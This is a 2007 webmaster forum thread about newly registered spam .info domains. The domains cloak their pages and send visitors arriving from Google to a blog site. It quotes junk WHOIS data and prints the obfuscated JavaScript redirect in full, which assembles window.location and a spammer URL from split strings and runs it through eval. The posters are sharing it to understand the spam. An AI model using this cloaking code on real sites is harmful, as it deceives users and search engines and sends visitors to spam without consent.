Have another thread about my site disappearing overnight today and now I have some more information to why it might be this way. I see tons of different new sites with a javascript redirect in their pages where they check to see if it is Google or not. It seems that they have targeted a blog site somehow so when you click on the link in Google you redirects to a blog site. This search shows just a few of the sites with the info domain and a date of 04/05/07 or 04/06/2007 so they are newly indexed by Google. This is their Registrar info and the domain was created 2 days ago!! Domain ID17129242-LRMS Domain Name:YOLEKRAC.INFO Created On:05-Apr-2007 05:54:55 UTC Last Updated On:05-Apr-2007 05:54:59 UTC Expiration Date:05-Apr-2008 05:54:55 UTC Sponsoring Registrarirect Information Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS) Status:CLIENT TRANSFER PROHIBITED Status:TRANSFER PROHIBITED Registrant IDI_5960474 Registrant Name:wnvbial fgjxyjo townibyq Registrant Organizationwmzu jnrwrmbr Registrant Street1:rijniwr nrmhbu Registrant Street2: Registrant Street3: Registrant City:ndwczua pvmhmwrv Registrant State/Province:0 Registrant Postal Code:54786 Registrant Country:CN Registrant Phone:+314.7605892 Additional info: If you, for example, type in this address in your browser: kaipeiwr.oeddvekr.info/music_posters.html then you get a service unavailable page. If you click on a search result in google you are redirected to a blog. They use a javascript and it looks like this: if(top.document.referrer.indexOf("google") != -1 && top.document.referrer.indexOf("search") != -1 && top.document.referrer.indexOf("=") != -1 && top.document.referrer.indexOf("?") != -1) { var pizden=document.referrer; var reg=/.+google.+search.+q=([\w\d\+%]+)[\&]*.*/; var arr=reg.exec(pizden); var upis1='http://aboutev'; var upis2='erythingblogz'; var upis3='.com/?q='; var piska00="win"; var piska01="dow."; var piska02="loca"; var piska03="tion='"; var piska1="'"; eval(piska00+piska01+piska02+piska03+upis1+upis2+upis3+arr[1]+piska1); } More additions: If you search for this you will find about 336,000 pages with different info domains. Some of them seems ok but most of them are spam sites with a index date as of a couple of days ago and with a registration date as of a couple of days ago.
Morrn, morrn..... Once again Google has been infiltrated by spam sites and somehow the sites was registered a couple of days ago, and they are already in the index...... How'd you like that?
I see. But this happens every day, getting them indexed is the easiest part. But its interesting, do you have any solution or way to prevent it other than reporting to Google ?